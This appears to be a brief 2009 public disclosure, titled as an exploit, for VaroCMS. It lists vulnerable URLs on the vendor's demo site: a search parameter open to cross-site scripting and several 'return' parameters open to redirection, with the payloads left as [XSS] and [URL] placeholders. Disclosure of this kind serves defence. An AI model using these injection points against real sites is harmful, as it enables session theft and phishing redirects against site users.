# Exploit Title: VaroCMS: Community Voting Web2.0 CMS XSS & Open Redirection
# Date: 22/12/2009
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Version: VaroCMS: Community Voting Web2.0 CMS
#[Cross Site Scripting]
http://www.varocms.com/demo/search?q=[XSS]
#
#[Open Redirection]
http://varocms.com/demo/login?return=[URL]
http://blog.varocms.com/demo/register?return=[URL]
http://www.varocms.com/demo/resize/1024?return=[URL]
http://www.varocms.com/demo/resize/1280?return=[URL]
http://www.varocms.com/demo/resize/1600?return=[URL]
http://www.varocms.com/demo/resize/1920?return=[URL]
#
#
#[E0F]